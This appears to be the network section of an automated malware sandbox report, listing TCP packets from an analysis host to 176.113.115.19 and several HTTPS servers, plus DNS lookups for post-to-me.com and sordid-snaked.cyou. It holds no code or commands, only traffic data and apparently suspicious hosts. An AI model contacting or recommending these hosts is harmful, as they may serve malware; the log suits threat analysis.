Dec 14, 2024 14:12:48.683990955 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.684102058 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.686151981 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.686244011 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.686248064 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.686357021 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.688458920 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.688539982 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.688559055 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.688579082 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.690531015 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.690587044 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.690627098 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.690668106 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.692646027 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.692692041 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.692727089 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.692864895 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.694713116 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.694771051 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.694818020 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.695034027 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.696822882 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.696927071 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.696971893 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.696971893 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.698892117 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.698956966 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.698997974 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.699040890 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.701020002 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.701096058 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.701181889 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.701251984 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.703099966 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.703233957 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.703273058 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.703274012 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.705169916 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.705255032 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.705261946 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.705301046 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.707269907 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.707330942 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.707376003 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.708059072 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.709363937 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.709461927 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.709467888 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.709788084 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.711424112 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.711543083 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.711575031 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.711599112 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.713623047 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.713677883 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.713686943 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.713726997 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.715667963 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.715749025 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.715771914 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.715790033 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.717714071 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.717812061 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.717822075 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.717926025 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.719821930 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.719918013 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.719934940 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.719974041 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.721903086 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.721963882 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.722028017 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.722104073 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.724025965 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.724153996 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.724163055 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.724240065 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.726090908 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.726125956 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.726193905 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.726231098 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.728176117 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.728274107 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.728285074 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.728370905 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.730483055 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.730531931 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.730848074 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.730886936 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.732469082 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.732517958 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.732539892 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.732619047 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.734476089 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.734549046 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.734568119 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.734606981 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.736534119 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.736628056 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.736648083 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.736764908 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.738660097 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.738709927 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.738753080 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.738753080 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.740792990 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.740806103 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.740852118 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.740869045 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.742842913 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.742943048 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.742985964 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.742985964 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.744962931 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.745012045 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.745138884 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.745178938 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.747046947 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.747178078 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.747217894 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.747217894 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.749114990 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.749162912 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.749239922 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.749449015 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.751192093 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.751302004 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.751390934 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.751390934 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.754370928 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.754384995 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.754420042 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.754508018 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.828269958 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.828425884 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.828469038 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.828527927 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.828919888 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.828988075 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.829025030 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.829061985 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.830667973 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.830723047 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.830759048 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.830854893 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.832334995 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.832391977 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.832431078 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.832483053 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.834009886 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.834115982 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.834266901 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.834314108 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.835658073 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.835757971 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.835802078 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.835802078 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.837269068 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.837327003 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.837335110 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.837409019 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.838920116 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.838975906 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.839040995 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.839194059 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.840462923 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.840575933 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.840588093 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.840672016 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.841993093 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.842127085 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.842185974 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.842185974 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.843552113 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.843619108 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.843687057 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.843750954 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.845083952 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.845144987 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.845185041 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.845288992 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.846575022 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.846635103 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.846693039 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.846774101 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.848093033 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.848165989 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.848208904 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.848254919 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.849579096 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.849684000 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.849689960 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.849761963 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.851056099 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.851121902 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.851186037 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.851269960 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.852504015 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.852596998 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.852638006 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.852715969 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.853940010 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.854033947 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.854043961 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.854099035 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.855380058 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.855436087 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.855474949 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.855534077 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.856782913 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.856843948 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.856904984 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.856983900 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.858261108 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.858318090 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.858340979 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.858423948 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.859685898 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.859770060 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.859776974 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.859891891 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.861054897 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.861151934 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.861167908 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.861385107 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.862412930 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.862468004 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.862512112 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.862581015 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:52.811543941 CET	49732	443	192.168.2.4	104.21.22.222
Dec 14, 2024 14:12:52.811624050 CET	443	49732	104.21.22.222	192.168.2.4
Dec 14, 2024 14:12:52.811717987 CET	49732	443	192.168.2.4	104.21.22.222
Dec 14, 2024 14:12:52.813087940 CET	49732	443	192.168.2.4	104.21.22.222
Dec 14, 2024 14:12:52.813102961 CET	443	49732	104.21.22.222	192.168.2.4
Dec 14, 2024 14:12:53.126835108 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:53.126924992 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:54.029237986 CET	443	49732	104.21.22.222	192.168.2.4
Dec 14, 2024 14:12:54.029381037 CET	49732	443	192.168.2.4	104.21.22.222
Dec 14, 2024 14:12:54.095278978 CET	49732	443	192.168.2.4	104.21.22.222
Dec 14, 2024 14:12:54.095321894 CET	443	49732	104.21.22.222	192.168.2.4
Dec 14, 2024 14:12:54.095658064 CET	443	49732	104.21.22.222	192.168.2.4
Dec 14, 2024 14:12:54.142155886 CET	49732	443	192.168.2.4	104.21.22.222
Dec 14, 2024 14:12:54.375416040 CET	49732	443	192.168.2.4	104.21.22.222
Dec 14, 2024 14:12:54.375463963 CET	49732	443	192.168.2.4	104.21.22.222
Dec 14, 2024 14:12:54.375593901 CET	443	49732	104.21.22.222	192.168.2.4
Dec 14, 2024 14:12:56.157847881 CET	443	49732	104.21.22.222	192.168.2.4
Dec 14, 2024 14:12:56.157947063 CET	443	49732	104.21.22.222	192.168.2.4
Dec 14, 2024 14:12:56.158135891 CET	49732	443	192.168.2.4	104.21.22.222
Dec 14, 2024 14:12:56.170505047 CET	49732	443	192.168.2.4	104.21.22.222
Dec 14, 2024 14:12:56.170540094 CET	443	49732	104.21.22.222	192.168.2.4
Dec 14, 2024 14:12:56.319282055 CET	49733	443	192.168.2.4	104.21.96.1
Dec 14, 2024 14:12:56.319350004 CET	443	49733	104.21.96.1	192.168.2.4
Dec 14, 2024 14:12:56.319422007 CET	49733	443	192.168.2.4	104.21.96.1
Dec 14, 2024 14:12:56.319844961 CET	49733	443	192.168.2.4	104.21.96.1
Dec 14, 2024 14:12:56.319861889 CET	443	49733	104.21.96.1	192.168.2.4
Dec 14, 2024 14:12:57.535135984 CET	443	49733	104.21.96.1	192.168.2.4
Dec 14, 2024 14:12:57.535218000 CET	49733	443	192.168.2.4	104.21.96.1
Dec 14, 2024 14:12:57.537632942 CET	49733	443	192.168.2.4	104.21.96.1
Dec 14, 2024 14:12:57.537642956 CET	443	49733	104.21.96.1	192.168.2.4
Dec 14, 2024 14:12:57.537894011 CET	443	49733	104.21.96.1	192.168.2.4
Dec 14, 2024 14:12:57.539441109 CET	49733	443	192.168.2.4	104.21.96.1
Dec 14, 2024 14:12:57.539472103 CET	49733	443	192.168.2.4	104.21.96.1
Dec 14, 2024 14:12:57.539515972 CET	443	49733	104.21.96.1	192.168.2.4
Dec 14, 2024 14:12:59.016767979 CET	443	49733	104.21.96.1	192.168.2.4
Dec 14, 2024 14:12:59.016879082 CET	443	49733	104.21.96.1	192.168.2.4
Dec 14, 2024 14:12:59.017143011 CET	49733	443	192.168.2.4	104.21.96.1
Dec 14, 2024 14:12:59.017544985 CET	49733	443	192.168.2.4	104.21.96.1
Dec 14, 2024 14:12:59.017544985 CET	49733	443	192.168.2.4	104.21.96.1
Dec 14, 2024 14:12:59.017560959 CET	443	49733	104.21.96.1	192.168.2.4
Dec 14, 2024 14:12:59.017569065 CET	443	49733	104.21.96.1	192.168.2.4
Dec 14, 2024 14:13:00.083678961 CET	49735	443	192.168.2.4	23.55.153.106
Dec 14, 2024 14:13:00.083753109 CET	443	49735	23.55.153.106	192.168.2.4
Dec 14, 2024 14:13:00.083843946 CET	49735	443	192.168.2.4	23.55.153.106
Dec 14, 2024 14:13:00.084988117 CET	49735	443	192.168.2.4	23.55.153.106
Dec 14, 2024 14:13:00.085004091 CET	443	49735	23.55.153.106	192.168.2.4
Dec 14, 2024 14:13:01.486270905 CET	443	49735	23.55.153.106	192.168.2.4
Dec 14, 2024 14:13:01.486387968 CET	49735	443	192.168.2.4	23.55.153.106
Dec 14, 2024 14:13:01.488418102 CET	49735	443	192.168.2.4	23.55.153.106
Dec 14, 2024 14:13:01.488451958 CET	443	49735	23.55.153.106	192.168.2.4
Dec 14, 2024 14:13:01.488784075 CET	443	49735	23.55.153.106	192.168.2.4
Dec 14, 2024 14:13:01.490008116 CET	49735	443	192.168.2.4	23.55.153.106
Dec 14, 2024 14:13:01.535330057 CET	443	49735	23.55.153.106	192.168.2.4
Dec 14, 2024 14:13:02.327399969 CET	443	49735	23.55.153.106	192.168.2.4
Dec 14, 2024 14:13:02.327440023 CET	443	49735	23.55.153.106	192.168.2.4
Dec 14, 2024 14:13:02.327459097 CET	443	49735	23.55.153.106	192.168.2.4
Dec 14, 2024 14:13:02.327661037 CET	49735	443	192.168.2.4	23.55.153.106
Dec 14, 2024 14:13:02.327661037 CET	49735	443	192.168.2.4	23.55.153.106
Dec 14, 2024 14:13:02.327717066 CET	443	49735	23.55.153.106	192.168.2.4
Dec 14, 2024 14:13:02.327766895 CET	49735	443	192.168.2.4	23.55.153.106
Dec 14, 2024 14:13:02.515611887 CET	443	49735	23.55.153.106	192.168.2.4
Dec 14, 2024 14:13:02.515685081 CET	443	49735	23.55.153.106	192.168.2.4
Dec 14, 2024 14:13:02.515707970 CET	49735	443	192.168.2.4	23.55.153.106
Dec 14, 2024 14:13:02.515753984 CET	443	49735	23.55.153.106	192.168.2.4
Dec 14, 2024 14:13:02.515800953 CET	49735	443	192.168.2.4	23.55.153.106
Dec 14, 2024 14:13:02.541239977 CET	443	49735	23.55.153.106	192.168.2.4
Dec 14, 2024 14:13:02.541289091 CET	443	49735	23.55.153.106	192.168.2.4
Dec 14, 2024 14:13:02.541299105 CET	49735	443	192.168.2.4	23.55.153.106
Dec 14, 2024 14:13:02.541320086 CET	443	49735	23.55.153.106	192.168.2.4
Dec 14, 2024 14:13:02.541357994 CET	49735	443	192.168.2.4	23.55.153.106
Dec 14, 2024 14:13:02.541372061 CET	443	49735	23.55.153.106	192.168.2.4
Dec 14, 2024 14:13:02.541409016 CET	49735	443	192.168.2.4	23.55.153.106
Dec 14, 2024 14:13:02.545124054 CET	49735	443	192.168.2.4	23.55.153.106
Dec 14, 2024 14:13:02.545141935 CET	443	49735	23.55.153.106	192.168.2.4
Dec 14, 2024 14:13:02.545160055 CET	49735	443	192.168.2.4	23.55.153.106
Dec 14, 2024 14:13:02.545166016 CET	443	49735	23.55.153.106	192.168.2.4
Dec 14, 2024 14:14:34.049189091 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:14:34.361044884 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:14:34.970431089 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:14:36.173592091 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:14:38.579874039 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:14:43.392391920 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:14:52.999969006 CET	49731	80	192.168.2.4	176.113.115.19

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 14, 2024 14:12:44.092628956 CET	64594	53	192.168.2.4	1.1.1.1
Dec 14, 2024 14:12:44.230386972 CET	53	64594	1.1.1.1	192.168.2.4
Dec 14, 2024 14:12:52.521399021 CET	52644	53	192.168.2.4	1.1.1.1
Dec 14, 2024 14:12:52.659321070 CET	53	52644	1.1.1.1	192.168.2.4
Dec 14, 2024 14:12:52.661006927 CET	52948	53	192.168.2.4	1.1.1.1
Dec 14, 2024 14:12:52.805876017 CET	53	52948	1.1.1.1	192.168.2.4
Dec 14, 2024 14:12:56.173424959 CET	60088	53	192.168.2.4	1.1.1.1
Dec 14, 2024 14:12:56.317714930 CET	53	60088	1.1.1.1	192.168.2.4
Dec 14, 2024 14:12:59.018982887 CET	63184	53	192.168.2.4	1.1.1.1
Dec 14, 2024 14:12:59.159318924 CET	53	63184	1.1.1.1	192.168.2.4
Dec 14, 2024 14:12:59.179780006 CET	64277	53	192.168.2.4	1.1.1.1
Dec 14, 2024 14:12:59.317240000 CET	53	64277	1.1.1.1	192.168.2.4
Dec 14, 2024 14:12:59.324973106 CET	51481	53	192.168.2.4	1.1.1.1
Dec 14, 2024 14:12:59.462673903 CET	53	51481	1.1.1.1	192.168.2.4
Dec 14, 2024 14:12:59.503865004 CET	63953	53	192.168.2.4	1.1.1.1
Dec 14, 2024 14:12:59.642215014 CET	53	63953	1.1.1.1	192.168.2.4
Dec 14, 2024 14:12:59.656713009 CET	56148	53	192.168.2.4	1.1.1.1
Dec 14, 2024 14:12:59.796127081 CET	53	56148	1.1.1.1	192.168.2.4
Dec 14, 2024 14:12:59.797862053 CET	65393	53	192.168.2.4	1.1.1.1
Dec 14, 2024 14:12:59.936794043 CET	53	65393	1.1.1.1	192.168.2.4
Dec 14, 2024 14:12:59.938951015 CET	51290	53	192.168.2.4	1.1.1.1
Dec 14, 2024 14:13:00.076380014 CET	53	51290	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 14, 2024 14:12:44.092628956 CET	192.168.2.4	1.1.1.1	0x30c3	Standard query (0)	post-to-me.com	A (IP address)	IN (0x0001)	false
Dec 14, 2024 14:12:52.521399021 CET	192.168.2.4	1.1.1.1	0x9cb8	Standard query (0)	sordid-snaked.cyou	A (IP address)	IN (0x0001)	false
